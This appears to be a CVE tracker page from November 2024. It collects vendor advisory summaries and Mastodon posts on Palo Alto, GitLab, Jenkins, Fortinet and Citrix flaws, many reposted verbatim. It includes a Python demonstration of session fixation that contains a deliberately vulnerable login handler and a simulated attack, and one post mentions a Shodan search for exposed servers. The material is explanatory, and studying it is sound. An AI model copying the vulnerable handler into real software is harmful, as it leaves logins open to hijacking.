cisakevtracker@mastodon.social at 2024-11-14T19:00:54.000Z ##

CVE ID: CVE-2024-9465
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition SQL Injection Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-7404
(6.8 MEDIUM)

EPSS: 0.04%

updated 2024-11-15T13:58:08.913000

1 posts

An issue was discovered in GitLab CE/EE affecting all versions starting from 17.2 prior to 17.3.7, starting from 17.4 prior to 17.4.4 and starting from 17.5 prior to 17.5.2, which could have allowed an attacker gaining full API access as the victim via the Device OAuth flow.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-9463
(7.5 HIGH)

EPSS: 96.23%

updated 2024-11-15T02:00:01.687000

9 posts

An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

Nuclei template

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

screaminggoat@infosec.exchange at 2024-11-14T19:30:12.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-9463 (9.9 critical) Palo Alto Networks Expedition OS Command Injection Vulnerability
  • CVE-2024-9465 (9.2 critical) Palo Alto Networks Expedition SQL Injection Vulnerability

#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity

##

oversecurity@mastodon.social at 2024-11-18T07:40:10.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog

CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...

🔗️ [Cyble] link.is.it/qfqgxi

##

jos1264@social.skynetcloud.site at 2024-11-15T11:40:04.000Z ##

Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) helpnetsecurity.com/2024/11/15 #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA

##

cisakevtracker@mastodon.social at 2024-11-14T19:01:09.000Z ##

CVE ID: CVE-2024-9463
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition OS Command Injection Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-52551
(8.0 HIGH)

EPSS: 0.04%

updated 2024-11-14T22:45:14

1 posts

Jenkins Pipeline: Declarative Plugin 2.2214.vb_b_34b_2ea_9b_83 and earlier does not check whether the main (Jenkinsfile) script used to restart a build from a specific stage is approved, allowing attackers with Item/Build permission to restart a previous build whose (Jenkinsfile) script is no longer approved. This allows attackers with Item/Build permission to restart a previous build whose (Jenki

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52552
(8.0 HIGH)

EPSS: 0.04%

updated 2024-11-14T22:45:13

1 posts

Jenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing the job name with JavaScript on the Authorization view, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. Authorize Project Pl

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-49025
(5.4 MEDIUM)

EPSS: 0.05%

updated 2024-11-14T21:32:11

4 posts

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

CVE-2024-36513
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T20:35:26.093000

1 posts

A privilege context switching error vulnerability [CWE-270] in FortiClient Windows version 7.2.4 and below, version 7.0.12 and below, 6.4 all versions may allow an authenticated user to escalate their privileges via lua auto patch scripts.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-36509
(4.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T20:33:44.727000

1 posts

An exposure of sensitive system information to an unauthorized control sphere vulnerability [CWE-497] in FortiWeb version 7.6.0, version 7.4.3 and below, version 7.2.10 and below, version 7.0.10 and below, version 6.3.23 and below may allow an authenticated attacker to access the encrypted passwords of other administrators via the "Log Access Event" logs page.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-8068(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T18:30:34

3 posts

Privilege escalation to NetworkService Account access in Citrix Session Recording when an attacker is an authenticated user in the same Windows Active Directory domain as the session recording server domain

screaminggoat@infosec.exchange at 2024-11-13T14:17:04.000Z ##

The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.

#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr

##

GossiTheDog@cyberplace.social at 2024-11-12T21:22:55.000Z ##

If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).

It’s a niche scenario for direct internet access.

Vendor advisory: support.citrix.com/s/article/C

Technical write up: labs.watchtowr.com/visionaries

Shodan dork: beta.shodan.io/search?query=ht

Citrix have used terms like “limited RCE” and “intranet” 🤨

##

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-50252
(5.5 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T18:08:17.857000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_ipip: Fix memory leak when changing remote IPv6 address The device stores IPv6 addresses that are used for encapsulation in linear memory that is managed by the driver. Changing the remote address of an ip6gre net device never worked properly, but since cited commit the following reproducer [1] would result in a

CVE-2024-52554
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T15:42:42

1 posts

Jenkins Shared Library Version Override Plugin 17.v786074c9fce7 and earlier declares folder-scoped library overrides as trusted, so that they're not executed in the Script Security sandbox, allowing attackers with Item/Configure permission on a folder to configure a folder-scoped library override that runs without sandbox protection. This allows attackers with Item/Configure permission on a folder

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52550
(8.0 HIGH)

EPSS: 0.04%

updated 2024-11-14T15:41:49

1 posts

Jenkins Pipeline: Groovy Plugin 3990.vd281dd77a_388 and earlier, except 3975.3977.v478dd9e956c3 does not check whether the main (Jenkinsfile) script for a rebuilt build is approved, allowing attackers with Item/Build permission to rebuild a previous build whose (Jenkinsfile) script is no longer approved. This allows attackers with Item/Build permission to rebuild a previous build whose (Jenkinsfil

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52553
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T15:37:53

1 posts

Jenkins OpenId Connect Authentication Plugin 4.418.vccc7061f5b_6d and earlier does not invalidate the previous session on login. This allows attackers to use social engineering techniques to gain administrator access to Jenkins. OpenId Connect Authentication Plugin 4.421.v5422614eb_e0a_ invalidates the existing session on login.
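The flaw class above (a login that keeps the pre-authentication session id) is easier to reason about with a minimal model. The following is an added example written for this page, not code from the OpenId Connect Authentication Plugin or Jenkins: the session store, the two login handlers and the attacker/victim simulation are all constructed here to show why "does not invalidate the previous session on login" lets a planted session id become an administrator session, and why rotating the id on login closes it.

```python
"""Session fixation: a login that keeps the pre-auth session id, beside one that rotates it."""
import secrets


class SessionStore:
    """Constructed in-memory stand-in for a servlet session container."""

    def __init__(self):
        self._sessions = {}  # session id -> attribute dict

    def create(self) -> str:
        sid = secrets.token_urlsafe(24)
        self._sessions[sid] = {}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def invalidate(self, sid) -> None:
        self._sessions.pop(sid, None)


def login_vulnerable(store: SessionStore, request_sid, user: str) -> str:
    """On a successful identity-provider callback the session the request
    arrived with is simply marked as authenticated. Whoever already knows
    request_sid (for example because they planted it via a crafted link)
    now holds a session for `user`."""
    session = store.get(request_sid)
    if session is None:
        request_sid = store.create()
        session = store.get(request_sid)
    session["user"] = user
    return request_sid


def login_fixed(store: SessionStore, request_sid, user: str) -> str:
    """Invalidate the pre-authentication session and issue a fresh id, so an
    id that anyone else learned before login is worthless afterwards."""
    if request_sid is not None:
        store.invalidate(request_sid)
    new_sid = store.create()
    store.get(new_sid)["user"] = user
    return new_sid


def fixation_succeeds(login) -> bool:
    """Simulate the attack: the attacker obtains an unauthenticated session id,
    the victim (an administrator) completes login while carrying that id, and
    the attacker then checks whether the id they already hold is now an
    administrator session."""
    store = SessionStore()
    attacker_sid = store.create()             # attacker's pre-auth session
    login(store, attacker_sid, "admin")       # victim logs in with the planted id
    session = store.get(attacker_sid)
    return session is not None and session.get("user") == "admin"


if __name__ == "__main__":
    print("vulnerable handler, attacker now admin:", fixation_succeeds(login_vulnerable))
    print("fixed handler, attacker now admin:    ", fixation_succeeds(login_fixed))
```

The social-engineering step the advisory text refers to is the part where the victim is induced to log in with a session id the attacker chose; the fixed handler makes that step harmless because the id the victim ends up with was never known to anyone else.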

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52549
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T15:35:55

1 posts

Jenkins Script Security Plugin 1367.vdf2fc45f229c and earlier, except 1365.1367.va_3b_b_89f8a_95b_ and 1362.1364.v4cf2dc5d8776, does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to check for the existence of files on the controller file system. This allows attackers with Overall/Read permission to check for the existence o

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-8648
(6.1 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T15:32:16

1 posts

An issue has been discovered in GitLab CE/EE affecting all versions from 16 before 17.3.7, 17.4 before 17.4.4, and 17.5 before 17.5.2. The vulnerability could allow an attacker to inject malicious JavaScript code in Analytics Dashboards through a specially crafted URL.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-5917(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:09

1 posts

A server-side request forgery in PAN-OS software enables an unauthenticated attacker to use the administrative web interface as a proxy, which enables the attacker to view internal network resources not otherwise accessible.

1 repos

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-9472(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:08

1 posts

A null pointer dereference in Palo Alto Networks PAN-OS software on PA-800 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series hardware platforms when Decryption policy is enabled allows an unauthenticated attacker to crash PAN-OS by sending specific traffic through the data plane, resulting in a denial of service (DoS) condition. Repeated attempts to trigger this condition will result in P

1 repos

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-2552(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:08

1 posts

A command injection vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to bypass system restrictions in the management plane and delete files on the firewall.

1 repos

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-5920(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-write Panorama administrator to push a specially crafted configuration to a PAN-OS node. This enables impersonation of a legitimate PAN-OS administrator who can perform restricted actions on the PAN-OS node after the execution of JavaScript in the legitimate PAN-OS administrator's browser

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-5918(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

An improper certificate validation vulnerability in Palo Alto Networks PAN-OS software enables an authorized user with a specially crafted client certificate to connect to an impacted GlobalProtect portal or GlobalProtect gateway as a different legitimate user. This attack is possible only if you "Allow Authentication with User Credentials OR Client Certificate."

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
